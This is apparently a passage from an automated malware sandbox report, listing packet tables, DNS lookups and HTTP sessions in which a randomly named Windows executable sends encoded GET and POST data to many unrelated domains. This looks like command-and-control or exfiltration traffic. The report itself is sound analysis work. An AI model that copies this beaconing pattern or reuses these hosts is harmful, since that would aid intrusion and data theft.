Oct 31, 2024 10:28:05.192290068 CET	80	50020	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:05.192394972 CET	50020	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:05.243526936 CET	80	50020	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:05.243675947 CET	50020	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:05.999784946 CET	50020	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:07.021655083 CET	50021	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:07.026855946 CET	80	50021	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:07.029637098 CET	50021	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:07.040473938 CET	50021	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:07.045447111 CET	80	50021	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:07.045532942 CET	80	50021	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:07.736751080 CET	80	50021	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:07.736799002 CET	80	50021	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:07.737740993 CET	50021	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:07.789060116 CET	80	50021	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:07.789663076 CET	50021	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:08.548309088 CET	50021	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:09.565587044 CET	50022	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:09.570760965 CET	80	50022	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:09.570885897 CET	50022	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:09.577969074 CET	50022	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:09.582899094 CET	80	50022	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:10.267272949 CET	80	50022	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:10.267280102 CET	80	50022	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:10.267399073 CET	50022	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:10.321702957 CET	80	50022	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:10.321846008 CET	50022	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:10.322688103 CET	50022	80	192.168.2.5	38.88.82.56
Oct 31, 2024 10:28:10.327516079 CET	80	50022	38.88.82.56	192.168.2.5
Oct 31, 2024 10:28:15.501600981 CET	50023	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:15.506834030 CET	80	50023	3.33.130.190	192.168.2.5
Oct 31, 2024 10:28:15.507097006 CET	50023	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:15.517599106 CET	50023	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:15.522774935 CET	80	50023	3.33.130.190	192.168.2.5
Oct 31, 2024 10:28:17.031610966 CET	50023	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:17.176631927 CET	80	50023	3.33.130.190	192.168.2.5
Oct 31, 2024 10:28:17.183832884 CET	50023	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:18.050237894 CET	50024	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:18.055346966 CET	80	50024	3.33.130.190	192.168.2.5
Oct 31, 2024 10:28:18.055438042 CET	50024	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:18.066993952 CET	50024	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:18.071827888 CET	80	50024	3.33.130.190	192.168.2.5
Oct 31, 2024 10:28:19.579694033 CET	50024	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:19.584949017 CET	80	50024	3.33.130.190	192.168.2.5
Oct 31, 2024 10:28:19.585196972 CET	50024	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:20.598128080 CET	50025	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:20.602919102 CET	80	50025	3.33.130.190	192.168.2.5
Oct 31, 2024 10:28:20.602984905 CET	50025	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:20.616404057 CET	50025	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:20.621268034 CET	80	50025	3.33.130.190	192.168.2.5
Oct 31, 2024 10:28:20.621303082 CET	80	50025	3.33.130.190	192.168.2.5
Oct 31, 2024 10:28:21.235934019 CET	80	50025	3.33.130.190	192.168.2.5
Oct 31, 2024 10:28:21.236330032 CET	50025	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:22.124737978 CET	50025	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:22.129797935 CET	80	50025	3.33.130.190	192.168.2.5
Oct 31, 2024 10:28:23.144687891 CET	50026	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:23.149710894 CET	80	50026	3.33.130.190	192.168.2.5
Oct 31, 2024 10:28:23.153660059 CET	50026	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:23.165590048 CET	50026	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:23.170433044 CET	80	50026	3.33.130.190	192.168.2.5
Oct 31, 2024 10:28:23.782612085 CET	80	50026	3.33.130.190	192.168.2.5
Oct 31, 2024 10:28:23.782915115 CET	80	50026	3.33.130.190	192.168.2.5
Oct 31, 2024 10:28:23.783155918 CET	50026	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:23.786107063 CET	50026	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:28:23.791270018 CET	80	50026	3.33.130.190	192.168.2.5
Oct 31, 2024 10:28:28.818631887 CET	50027	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:28.823478937 CET	80	50027	178.79.184.196	192.168.2.5
Oct 31, 2024 10:28:28.823565960 CET	50027	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:28.838083029 CET	50027	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:28.843538046 CET	80	50027	178.79.184.196	192.168.2.5
Oct 31, 2024 10:28:29.615266085 CET	80	50027	178.79.184.196	192.168.2.5
Oct 31, 2024 10:28:29.719520092 CET	80	50027	178.79.184.196	192.168.2.5
Oct 31, 2024 10:28:29.721679926 CET	50027	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:30.343508959 CET	50027	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:31.362324953 CET	50028	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:31.367784023 CET	80	50028	178.79.184.196	192.168.2.5
Oct 31, 2024 10:28:31.367937088 CET	50028	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:31.381603956 CET	50028	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:31.386507034 CET	80	50028	178.79.184.196	192.168.2.5
Oct 31, 2024 10:28:32.205207109 CET	80	50028	178.79.184.196	192.168.2.5
Oct 31, 2024 10:28:32.311769962 CET	80	50028	178.79.184.196	192.168.2.5
Oct 31, 2024 10:28:32.311830997 CET	50028	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:32.890336037 CET	50028	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:33.909638882 CET	50029	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:33.914782047 CET	80	50029	178.79.184.196	192.168.2.5
Oct 31, 2024 10:28:33.917709112 CET	50029	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:33.927992105 CET	50029	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:33.933098078 CET	80	50029	178.79.184.196	192.168.2.5
Oct 31, 2024 10:28:33.933118105 CET	80	50029	178.79.184.196	192.168.2.5
Oct 31, 2024 10:28:34.737459898 CET	80	50029	178.79.184.196	192.168.2.5
Oct 31, 2024 10:28:34.780895948 CET	50029	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:34.844110012 CET	80	50029	178.79.184.196	192.168.2.5
Oct 31, 2024 10:28:34.844204903 CET	50029	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:35.437601089 CET	50029	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:36.457211971 CET	50030	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:36.462205887 CET	80	50030	178.79.184.196	192.168.2.5
Oct 31, 2024 10:28:36.462279081 CET	50030	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:36.470405102 CET	50030	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:36.475399971 CET	80	50030	178.79.184.196	192.168.2.5
Oct 31, 2024 10:28:37.274589062 CET	80	50030	178.79.184.196	192.168.2.5
Oct 31, 2024 10:28:37.329654932 CET	50030	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:37.379825115 CET	80	50030	178.79.184.196	192.168.2.5
Oct 31, 2024 10:28:37.385601044 CET	50030	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:37.408329964 CET	50030	80	192.168.2.5	178.79.184.196
Oct 31, 2024 10:28:37.413213968 CET	80	50030	178.79.184.196	192.168.2.5
Oct 31, 2024 10:28:50.744021893 CET	50031	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:50.749084949 CET	80	50031	188.114.97.3	192.168.2.5
Oct 31, 2024 10:28:50.749280930 CET	50031	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:50.765952110 CET	50031	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:50.770917892 CET	80	50031	188.114.97.3	192.168.2.5
Oct 31, 2024 10:28:51.617609024 CET	80	50031	188.114.97.3	192.168.2.5
Oct 31, 2024 10:28:51.619631052 CET	80	50031	188.114.97.3	192.168.2.5
Oct 31, 2024 10:28:51.619707108 CET	50031	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:52.281953096 CET	50031	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:53.299977064 CET	50032	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:53.304959059 CET	80	50032	188.114.97.3	192.168.2.5
Oct 31, 2024 10:28:53.305038929 CET	50032	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:53.317709923 CET	50032	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:53.322591066 CET	80	50032	188.114.97.3	192.168.2.5
Oct 31, 2024 10:28:54.175386906 CET	80	50032	188.114.97.3	192.168.2.5
Oct 31, 2024 10:28:54.176903009 CET	80	50032	188.114.97.3	192.168.2.5
Oct 31, 2024 10:28:54.183883905 CET	50032	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:54.887192011 CET	50032	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:55.896156073 CET	50033	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:55.901160002 CET	80	50033	188.114.97.3	192.168.2.5
Oct 31, 2024 10:28:55.901232004 CET	50033	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:55.914752960 CET	50033	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:55.919636011 CET	80	50033	188.114.97.3	192.168.2.5
Oct 31, 2024 10:28:55.919723034 CET	80	50033	188.114.97.3	192.168.2.5
Oct 31, 2024 10:28:56.769582033 CET	80	50033	188.114.97.3	192.168.2.5
Oct 31, 2024 10:28:56.771950006 CET	80	50033	188.114.97.3	192.168.2.5
Oct 31, 2024 10:28:56.772008896 CET	50033	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:57.421581984 CET	50033	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:58.846654892 CET	50034	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:58.851737976 CET	80	50034	188.114.97.3	192.168.2.5
Oct 31, 2024 10:28:58.852119923 CET	50034	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:58.859709978 CET	50034	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:58.865132093 CET	80	50034	188.114.97.3	192.168.2.5
Oct 31, 2024 10:28:59.729388952 CET	80	50034	188.114.97.3	192.168.2.5
Oct 31, 2024 10:28:59.731318951 CET	80	50034	188.114.97.3	192.168.2.5
Oct 31, 2024 10:28:59.731611013 CET	50034	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:59.732417107 CET	50034	80	192.168.2.5	188.114.97.3
Oct 31, 2024 10:28:59.737198114 CET	80	50034	188.114.97.3	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 10:25:29.124505043 CET	51751	53	192.168.2.5	1.1.1.1
Oct 31, 2024 10:25:29.148885012 CET	53	51751	1.1.1.1	192.168.2.5
Oct 31, 2024 10:25:44.909432888 CET	64813	53	192.168.2.5	1.1.1.1
Oct 31, 2024 10:25:45.124136925 CET	53	64813	1.1.1.1	192.168.2.5
Oct 31, 2024 10:25:58.512469053 CET	60029	53	192.168.2.5	1.1.1.1
Oct 31, 2024 10:25:58.523341894 CET	53	60029	1.1.1.1	192.168.2.5
Oct 31, 2024 10:26:12.676842928 CET	59608	53	192.168.2.5	1.1.1.1
Oct 31, 2024 10:26:12.689831018 CET	53	59608	1.1.1.1	192.168.2.5
Oct 31, 2024 10:26:26.675282955 CET	63479	53	192.168.2.5	1.1.1.1
Oct 31, 2024 10:26:26.690865040 CET	53	63479	1.1.1.1	192.168.2.5
Oct 31, 2024 10:26:40.084060907 CET	61242	53	192.168.2.5	1.1.1.1
Oct 31, 2024 10:26:40.096298933 CET	53	61242	1.1.1.1	192.168.2.5
Oct 31, 2024 10:26:53.878948927 CET	58056	53	192.168.2.5	1.1.1.1
Oct 31, 2024 10:26:53.917401075 CET	53	58056	1.1.1.1	192.168.2.5
Oct 31, 2024 10:27:10.394356966 CET	56952	53	192.168.2.5	1.1.1.1
Oct 31, 2024 10:27:10.406240940 CET	53	56952	1.1.1.1	192.168.2.5
Oct 31, 2024 10:27:30.966809988 CET	52788	53	192.168.2.5	1.1.1.1
Oct 31, 2024 10:27:31.038505077 CET	53	52788	1.1.1.1	192.168.2.5
Oct 31, 2024 10:27:44.380497932 CET	57082	53	192.168.2.5	1.1.1.1
Oct 31, 2024 10:27:44.397254944 CET	53	57082	1.1.1.1	192.168.2.5
Oct 31, 2024 10:27:57.785592079 CET	51104	53	192.168.2.5	1.1.1.1
Oct 31, 2024 10:27:58.781112909 CET	51104	53	192.168.2.5	1.1.1.1
Oct 31, 2024 10:27:59.781584978 CET	51104	53	192.168.2.5	1.1.1.1
Oct 31, 2024 10:28:01.796890974 CET	51104	53	192.168.2.5	1.1.1.1
Oct 31, 2024 10:28:01.924173117 CET	53	51104	1.1.1.1	192.168.2.5
Oct 31, 2024 10:28:01.924201012 CET	53	51104	1.1.1.1	192.168.2.5
Oct 31, 2024 10:28:01.924233913 CET	53	51104	1.1.1.1	192.168.2.5
Oct 31, 2024 10:28:01.924247026 CET	53	51104	1.1.1.1	192.168.2.5
Oct 31, 2024 10:28:15.331548929 CET	55320	53	192.168.2.5	1.1.1.1
Oct 31, 2024 10:28:15.497332096 CET	53	55320	1.1.1.1	192.168.2.5
Oct 31, 2024 10:28:28.801851034 CET	50335	53	192.168.2.5	1.1.1.1
Oct 31, 2024 10:28:28.815424919 CET	53	50335	1.1.1.1	192.168.2.5
Oct 31, 2024 10:28:42.430988073 CET	51043	53	192.168.2.5	1.1.1.1
Oct 31, 2024 10:28:42.440109968 CET	53	51043	1.1.1.1	192.168.2.5
Oct 31, 2024 10:28:50.722506046 CET	49861	53	192.168.2.5	1.1.1.1
Oct 31, 2024 10:28:50.737565994 CET	53	49861	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 31, 2024 10:25:29.124505043 CET	192.168.2.5	1.1.1.1	0xbdb3	Standard query (0)	www.ladylawher.org	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:25:44.909432888 CET	192.168.2.5	1.1.1.1	0xf2cc	Standard query (0)	www.meanttobebroken.org	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:25:58.512469053 CET	192.168.2.5	1.1.1.1	0x253f	Standard query (0)	www.jexiz.shop	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:26:12.676842928 CET	192.168.2.5	1.1.1.1	0xc252	Standard query (0)	www.prediksipreman.fyi	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:26:26.675282955 CET	192.168.2.5	1.1.1.1	0x59bb	Standard query (0)	www.givora.site	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:26:40.084060907 CET	192.168.2.5	1.1.1.1	0x5c7e	Standard query (0)	www.2925588.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:26:53.878948927 CET	192.168.2.5	1.1.1.1	0xb0d1	Standard query (0)	www.wrl-llc.net	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:27:10.394356966 CET	192.168.2.5	1.1.1.1	0xd240	Standard query (0)	www.7fh27o.vip	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:27:30.966809988 CET	192.168.2.5	1.1.1.1	0x9913	Standard query (0)	www.rebel.tienda	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:27:44.380497932 CET	192.168.2.5	1.1.1.1	0x3a89	Standard query (0)	www.ila.beauty	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:27:57.785592079 CET	192.168.2.5	1.1.1.1	0xef4	Standard query (0)	www.college-help.info	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:27:58.781112909 CET	192.168.2.5	1.1.1.1	0xef4	Standard query (0)	www.college-help.info	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:27:59.781584978 CET	192.168.2.5	1.1.1.1	0xef4	Standard query (0)	www.college-help.info	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:28:01.796890974 CET	192.168.2.5	1.1.1.1	0xef4	Standard query (0)	www.college-help.info	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:28:15.331548929 CET	192.168.2.5	1.1.1.1	0x5b90	Standard query (0)	www.owinvip.net	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:28:28.801851034 CET	192.168.2.5	1.1.1.1	0xc3a4	Standard query (0)	www.gucciqueen.shop	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:28:42.430988073 CET	192.168.2.5	1.1.1.1	0xb9a8	Standard query (0)	www.xtelify.tech	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:28:50.722506046 CET	192.168.2.5	1.1.1.1	0x2b3b	Standard query (0)	www.timizoasisey.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 31, 2024 10:25:29.148885012 CET	1.1.1.1	192.168.2.5	0xbdb3	No error (0)	www.ladylawher.org	ladylawher.org		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 10:25:29.148885012 CET	1.1.1.1	192.168.2.5	0xbdb3	No error (0)	ladylawher.org		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:25:29.148885012 CET	1.1.1.1	192.168.2.5	0xbdb3	No error (0)	ladylawher.org		15.197.148.33	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:25:45.124136925 CET	1.1.1.1	192.168.2.5	0xf2cc	No error (0)	www.meanttobebroken.org		141.193.213.10	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:25:45.124136925 CET	1.1.1.1	192.168.2.5	0xf2cc	No error (0)	www.meanttobebroken.org		141.193.213.11	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:25:58.523341894 CET	1.1.1.1	192.168.2.5	0x253f	No error (0)	www.jexiz.shop	jexiz.shop		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 10:25:58.523341894 CET	1.1.1.1	192.168.2.5	0x253f	No error (0)	jexiz.shop		8.210.3.99	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:26:12.689831018 CET	1.1.1.1	192.168.2.5	0xc252	No error (0)	www.prediksipreman.fyi	prediksipreman.fyi		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 10:26:12.689831018 CET	1.1.1.1	192.168.2.5	0xc252	No error (0)	prediksipreman.fyi		162.0.215.244	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:26:26.690865040 CET	1.1.1.1	192.168.2.5	0x59bb	No error (0)	www.givora.site		162.0.231.203	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:26:40.096298933 CET	1.1.1.1	192.168.2.5	0x5c7e	No error (0)	www.2925588.com		103.71.154.12	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:26:53.917401075 CET	1.1.1.1	192.168.2.5	0xb0d1	No error (0)	www.wrl-llc.net	wrl-llc.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 10:26:53.917401075 CET	1.1.1.1	192.168.2.5	0xb0d1	No error (0)	wrl-llc.net		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:26:53.917401075 CET	1.1.1.1	192.168.2.5	0xb0d1	No error (0)	wrl-llc.net		15.197.148.33	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:27:10.406240940 CET	1.1.1.1	192.168.2.5	0xd240	No error (0)	www.7fh27o.vip	7fh27o.vip		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 10:27:10.406240940 CET	1.1.1.1	192.168.2.5	0xd240	No error (0)	7fh27o.vip		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:27:10.406240940 CET	1.1.1.1	192.168.2.5	0xd240	No error (0)	7fh27o.vip		15.197.148.33	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:27:31.038505077 CET	1.1.1.1	192.168.2.5	0x9913	No error (0)	www.rebel.tienda		199.59.243.227	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:27:44.397254944 CET	1.1.1.1	192.168.2.5	0x3a89	No error (0)	www.ila.beauty		13.248.169.48	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:27:44.397254944 CET	1.1.1.1	192.168.2.5	0x3a89	No error (0)	www.ila.beauty		76.223.54.146	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:28:01.924173117 CET	1.1.1.1	192.168.2.5	0xef4	No error (0)	www.college-help.info		38.88.82.56	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:28:01.924201012 CET	1.1.1.1	192.168.2.5	0xef4	No error (0)	www.college-help.info		38.88.82.56	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:28:01.924233913 CET	1.1.1.1	192.168.2.5	0xef4	No error (0)	www.college-help.info		38.88.82.56	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:28:01.924247026 CET	1.1.1.1	192.168.2.5	0xef4	No error (0)	www.college-help.info		38.88.82.56	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:28:15.497332096 CET	1.1.1.1	192.168.2.5	0x5b90	No error (0)	www.owinvip.net	owinvip.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 10:28:15.497332096 CET	1.1.1.1	192.168.2.5	0x5b90	No error (0)	owinvip.net		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:28:15.497332096 CET	1.1.1.1	192.168.2.5	0x5b90	No error (0)	owinvip.net		15.197.148.33	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:28:28.815424919 CET	1.1.1.1	192.168.2.5	0xc3a4	No error (0)	www.gucciqueen.shop	gucciqueen.shop		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 10:28:28.815424919 CET	1.1.1.1	192.168.2.5	0xc3a4	No error (0)	gucciqueen.shop		178.79.184.196	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:28:42.440109968 CET	1.1.1.1	192.168.2.5	0xb9a8	Name error (3)	www.xtelify.tech	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:28:50.737565994 CET	1.1.1.1	192.168.2.5	0x2b3b	No error (0)	www.timizoasisey.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:28:50.737565994 CET	1.1.1.1	192.168.2.5	0x2b3b	No error (0)	www.timizoasisey.shop		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.ladylawher.org

www.meanttobebroken.org

www.jexiz.shop

www.prediksipreman.fyi

www.givora.site

www.2925588.com

www.wrl-llc.net

www.7fh27o.vip

www.rebel.tienda

www.ila.beauty

www.college-help.info

www.owinvip.net

www.gucciqueen.shop

www.timizoasisey.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49794	3.33.130.190	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:25:29.420336008 CET	459	OUT	GET /up8i/?1Zgl=FonQAt5G6G0h5a/+Am3eqIyjBFdIhrbRfG5nxPFgUs1csnhs+lBXewxt89Cj5Voixu7jLVxWB2hHsNPmnpQd8jl3rIdXyfOz7R8oVB6YJtxbdf5wDUy9RxP636EXq/xHTA==&w6=2vdPP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.ladylawher.org User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 31, 2024 10:25:29.847512960 CET	401	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 31 Oct 2024 09:25:29 GMT Content-Type: text/html Content-Length: 261 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 31 5a 67 6c 3d 46 6f 6e 51 41 74 35 47 36 47 30 68 35 61 2f 2b 41 6d 33 65 71 49 79 6a 42 46 64 49 68 72 62 52 66 47 35 6e 78 50 46 67 55 73 31 63 73 6e 68 73 2b 6c 42 58 65 77 78 74 38 39 43 6a 35 56 6f 69 78 75 37 6a 4c 56 78 57 42 32 68 48 73 4e 50 6d 6e 70 51 64 38 6a 6c 33 72 49 64 58 79 66 4f 7a 37 52 38 6f 56 42 36 59 4a 74 78 62 64 66 35 77 44 55 79 39 52 78 50 36 33 36 45 58 71 2f 78 48 54 41 3d 3d 26 77 36 3d 32 76 64 50 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?1Zgl=FonQAt5G6G0h5a/+Am3eqIyjBFdIhrbRfG5nxPFgUs1csnhs+lBXewxt89Cj5Voixu7jLVxWB2hHsNPmnpQd8jl3rIdXyfOz7R8oVB6YJtxbdf5wDUy9RxP636EXq/xHTA==&w6=2vdPP"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49881	141.193.213.10	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:25:45.148505926 CET	737	OUT	POST /9g6s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 205 Cache-Control: no-cache Connection: close Host: www.meanttobebroken.org Origin: http://www.meanttobebroken.org Referer: http://www.meanttobebroken.org/9g6s/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 6f 39 2f 65 75 4a 74 44 6f 41 32 50 33 38 78 61 56 58 70 54 4d 32 43 77 6b 59 4c 68 72 58 76 6f 55 4f 45 7a 71 65 42 4c 34 4e 36 4f 68 36 67 4c 65 6b 77 71 61 46 4b 41 66 59 67 70 36 38 47 72 75 39 64 73 63 7a 79 58 4f 55 36 35 70 6c 6a 55 69 76 67 4b 4d 6f 34 73 51 6f 39 2f 4d 39 32 36 5a 73 42 71 32 4a 78 67 65 50 43 6e 49 4b 43 71 63 44 4e 35 6b 70 4e 6d 6a 4b 37 30 63 48 4c 46 63 32 61 65 72 2f 48 43 31 4d 4a 75 61 42 52 51 37 34 58 70 39 55 45 4f 68 37 4e 59 37 4e 36 57 62 58 6d 74 73 76 65 4e 39 54 46 6a 53 46 7a 41 57 2f 6b 44 4f 34 37 4a 4e 47 6b 5a 4e 34 51 2b 75 72 67 76 4d 36 45 3d Data Ascii: 1Zgl=o9/euJtDoA2P38xaVXpTM2CwkYLhrXvoUOEzqeBL4N6Oh6gLekwqaFKAfYgp68Gru9dsczyXOU65pljUivgKMo4sQo9/M926ZsBq2JxgePCnIKCqcDN5kpNmjK70cHLFc2aer/HC1MJuaBRQ74Xp9UEOh7NY7N6WbXmtsveN9TFjSFzAW/kDO47JNGkZN4Q+urgvM6E=
